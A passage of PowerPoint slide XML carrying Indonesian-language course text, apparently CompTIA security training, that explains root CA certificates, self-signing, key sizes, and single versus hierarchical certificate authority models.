              <a:t>mempercayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RSA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebesar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2.048 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4.096 bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ECC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/CA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "CompTIA Root CA."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh CA. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PKI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>runtuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hirarkis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hierarkis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, CA root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perantara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perantara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perantara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditelusuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root CA di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepanjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
